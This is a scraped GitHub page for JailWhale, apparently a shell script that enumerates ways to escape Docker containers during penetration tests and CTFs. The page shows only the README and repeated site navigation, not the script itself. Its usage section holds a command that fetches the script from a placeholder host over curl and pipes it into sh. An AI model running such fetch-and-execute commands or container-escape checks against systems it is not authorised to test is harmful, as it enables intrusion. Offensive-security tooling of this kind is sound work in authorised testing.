JailWhale

Docker escape enumeration tool to be used when you end up in a docker container during a penetration test. I tried to minimize the dependencies, so a common linux-based system with sh should be able to run JailWhale. Further checks and methods to be added, when I encounter new techniques in CTFs (pull requests welcome).

Usage

# On your host
python -m http.server 8080
# In the container
curl http://<YOUR_IP>:8080/JailWhale.sh | sh

Sample Output

TODO

More CVE-checks
More hints on exploiting capabilities
Add other techniques

Credits

Much love to https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout for documenting various techniques

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
doc		doc
JailWhale.sh		JailWhale.sh
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

JailWhale

Usage

Sample Output

TODO

Credits

About

Releases

Packages

Languages

eversinc33/JailWhale

Folders and files

Latest commit

History

Repository files navigation

JailWhale

Usage

Sample Output

TODO

Credits

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages